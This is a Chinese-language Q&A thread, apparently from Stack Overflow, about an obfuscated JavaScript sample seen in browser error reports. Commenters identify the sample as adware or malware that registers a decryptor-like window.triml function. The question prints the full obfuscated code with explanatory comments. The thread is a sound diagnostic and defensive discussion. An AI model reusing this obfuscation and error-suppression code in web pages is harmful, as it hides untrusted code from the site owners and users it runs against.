【问题标题】:underscore is not a function下划线不是函数
【发布时间】:2015-07-21 20:38:20
【问题描述】:

我们使用一种工具来跟踪用户浏览器中发生的 js 错误。我们有时会看到underscore 引发类似TypeError: string is not a function 的错误,因为它被看起来像这样的字符串覆盖

// Obfuscated sample quoted in the question. `_0x54e9` is a lookup table of
// hex-escaped string fragments; every property name below is rebuilt by
// concatenating entries, e.g. [8]+[9]+[1] = "filter", [5]+[6]+[7] = "constructor",
// [1]+[2]+[3]+[4] = "return this", [18]+[19]+[20]+[21] = "prototype".
// Recognising this table/concatenation pattern is the quickest way to spot
// the sample in error-tracker payloads.
var _0x54e9 = ['triml', "\x72", "\x65\x74\x75\x72", "\x6E\x20\x74\x68", "\x69\x73", "\x63\x6F", "\x6E\x73\x74\x72", "\x75\x63\x74\x6F\x72", "\x66\x69", "\x6C\x74\x65", "\x62\x69\x6E\x64", "\x63", "\x68\x61\x72", "\x43", "\x6F", "\x64\x65\x41\x74", "", "\x61\x70\x70\x6C\x79", "\x70", "\x72\x6F\x74\x6F", "\x74", "\x79\x70\x65", "\x46\x75\x6E\x63\x74\x69\x6F\x6E", "\x4D\x61\x74\x68", "\x73\x65\x74\x49\x6E\x74\x65\x72\x76\x61\x6C", "\x63\x6C\x65\x61\x72\x49\x6E\x74\x65\x72\x76\x61\x6C", "\x6A\x6F\x69\x6E", "\x70\x75\x73\x68", "\x70\x61\x72\x73\x65\x49\x6E\x74", "\x66", "\x6D", "\x68", "\x61\x72", "\x64\x65", "\x73\x70\x6C\x69\x74", "\x63\x6F\x6E\x63\x61\x74", "\x31", "\x30", "\x32", "\x72\x61\x6E\x64\x6F\x6D", "\x73\x70\x6C\x69\x63\x65", "\x40", "\x74\x6F\x53\x74\x72\x69\x6E\x67", "\x0A\x0A\x0A", "\x6C\x65\x6E\x67\x74\x68", "\x6E", "\x61\x74"];
// `[]["filter"]["constructor"]("return this")()` evaluates to the global object
// (`window` in a browser) without naming it. This statement assigns a function
// to its "triml" property (_0x54e9[0]) - the `window.triml` the discussion
// mentions - and immediately binds that function to the global object.
// Parameters: _0x95b5x1 is the string to work on; _0x95b5x2 toggles a
// "debug" mode in which timers are replaced by a synchronous stub and errors
// are rethrown/returned instead of swallowed.
[][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[0]] = function(_0x95b5x1, _0x95b5x2) {
    try {
        // `with` shadows `console` and `window` with null inside the block
        // (hampers logging/inspection). `s` starts as an array holding one
        // string built from "\n\n\n" (_0x54e9[43]) by repeated self-concat
        // until a random length threshold (Math.random() * 44332 + 323456)
        // is reached; `c` starts empty.
        with({
            console: null,
            window: null,
            s: [(function _0x95b5x10() {
                return (this[_0x54e9[44]] < ((([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[23]][_0x54e9[39]]() * 44332) + 323456) >> 0)) ? _0x95b5x10[_0x54e9[17]](this[_0x54e9[11] + _0x54e9[14] + _0x54e9[45] + _0x54e9[11] + _0x54e9[46]](this)) : this
            }[_0x54e9[17]](_0x54e9[43]))[_0x54e9[42]]()],
            c: []
        }) {
            // Locals are native helpers fetched through the global object:
            // _0x95b5x3 = "".charCodeAt bound to the input string,
            // _0x95b5x4 = Math, _0x95b5x5 = stub that just calls its argument,
            // _0x95b5x6/_0x95b5x7 = setInterval/clearInterval bound to the
            // global object (or the stub when _0x95b5x2 is set),
            // _0x95b5x9/_0x95b5xa = join/push bound to c, _0x95b5xb = push bound
            // to s, _0x95b5xc = parseInt, _0x95b5xd = String.fromCharCode.
            var _0x95b5x3 = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[22]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[10]][_0x54e9[17]]((_0x54e9[16])[_0x54e9[11] + _0x54e9[12] + _0x54e9[13] + _0x54e9[14] + _0x54e9[15]], [_0x95b5x1]),
                _0x95b5x4 = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[23]],
                _0x95b5x5 = (function(_0x95b5xf) {
                    _0x95b5xf && _0x95b5xf()
                }),
                _0x95b5x6 = _0x95b5x2 ? _0x95b5x5 : [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[24]][_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()),
                _0x95b5x7 = _0x95b5x2 ? _0x95b5x5 : [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[25]][_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()),
                _0x95b5x8 = 1000000,
                _0x95b5x9 = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[26]][_0x54e9[10]](c, [_0x54e9[16]]),
                _0x95b5xa = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[27]][_0x54e9[10]](c),
                _0x95b5xb = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[27]][_0x54e9[10]](s),
                _0x95b5xc = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[28]],
                _0x95b5xd = (_0x54e9[16])[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[29] + _0x54e9[1] + _0x54e9[14] + _0x54e9[30] + _0x54e9[13] + _0x54e9[31] + _0x54e9[32] + _0x54e9[13] + _0x54e9[14] + _0x54e9[33]],
                // Interval callback (1 ms, or run once via the stub in debug
                // mode). It splices random-sized slices out of s/c, walks the
                // input string's char codes with an XOR against this[0] and
                // rebuilds characters via parseInt + fromCharCode - the
                // "decryptor" behaviour the discussion guessed at. The inner
                // catch clears the interval and rethrows only in debug mode;
                // the outer catch swallows everything otherwise.
                _0x95b5xe = _0x95b5x6(function() {
                    try {
                        (function() {
                            try {
                                [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](s, [1, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](c, [0, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && _0x95b5x7(!(this[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[17]](this[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]], [(function() {
                                    while ((this[5]++, _0x95b5xa(_0x95b5x3(this[5] - 1) ^ this[0] ? ((!((!(_0x95b5x3(this[5] - 1) & this[1])) && (_0x95b5xb(_0x95b5xd(_0x95b5xc(_0x95b5x9(), this[4])), [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](c, [0, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && _0x54e9[16])))) ? this[1] : _0x54e9[16]) : this[2]), !!this[7 + this[5]])) {}
                                }[_0x54e9[10]](this)[_0x54e9[17]]()) || ([][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[26]][_0x54e9[17]](s, [_0x54e9[16]])) || _0x54e9[41]])() && [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](s, [1, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8])) && _0x95b5xe)
                            } catch (A) {
                                _0x95b5x7(_0x95b5xe);
                                if (_0x95b5x2) {
                                    throw A
                                };
                            }
                        }[_0x54e9[10]]([31, _0x54e9[36], _0x54e9[37], _0x54e9[16], _0x54e9[38], 0][_0x54e9[35]](_0x95b5x1[_0x54e9[34]](_0x54e9[16])))())
                    } catch (A) {
                        if (_0x95b5x2) {
                            throw A
                        }
                    }
                }[_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()), 1)
        }
    } catch (A) {
        // Outermost handler: the error is returned (not thrown) in debug mode
        // and silently dropped otherwise, which is why the sample rarely
        // surfaces in error trackers on its own.
        if (_0x95b5x2) {
            return A
        }
    }
}[_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])());

有谁知道这是从哪里来的以及如何防止这种情况发生?

【问题讨论】:

  • 这个错误是怎么和 underscore 关联起来的?
  • 我不建议任何人运行此代码。这是一个恶意软件。
  • ddecode.com/hexdecoder/…,您会看到数组的解码值。从那里你可以解扰其他部分。它们由数组值组合而成。
  • 我认为它是写得很差的客户端恶意软件(浏览器工具栏之类)。除了向访问者推荐 Spybot - Search & Destroy 之类的工具外,你无能为力。这与 underscore.js 无关,它们只是使用了以下划线开头的函数名称。我使用 qbaka 来检测客户端 JS 错误,我收到很多与某些广告软件、恶意软件等相关的错误消息。
  • @Reeno: 值得一提的是,这个恶意软件用到了 Array#filter,而 IE8 中并不存在该方法。如果能知道报告此问题的用户代理(User-Agent)是否存在某种规律,会很有意思。

标签: javascript overwrite malware


【解决方案1】:

此代码与 underscore.js 无关。这些只是以 _ 开头的变量。恢复功能的最佳方法是从未受恶意软件影响的上次备份中恢复站点。修复代码中的漏洞(例如 MySQL 注入)并更新第三方组件,以避免系统被进一步利用。经常更新和备份。

【讨论】:

  • 感谢 Ruslanas 的回答。我很确定它与我的 js 代码无关。我自己从来没有能够复制它。我只在Rollbar(js跟踪系统)的错误报告中看到了这些错误。
  • 我已经部分解密了代码。它注册了 window.triml 函数,该函数本身似乎无害。它的函数体中某处有 xor 操作,所以我猜它是某种解密器。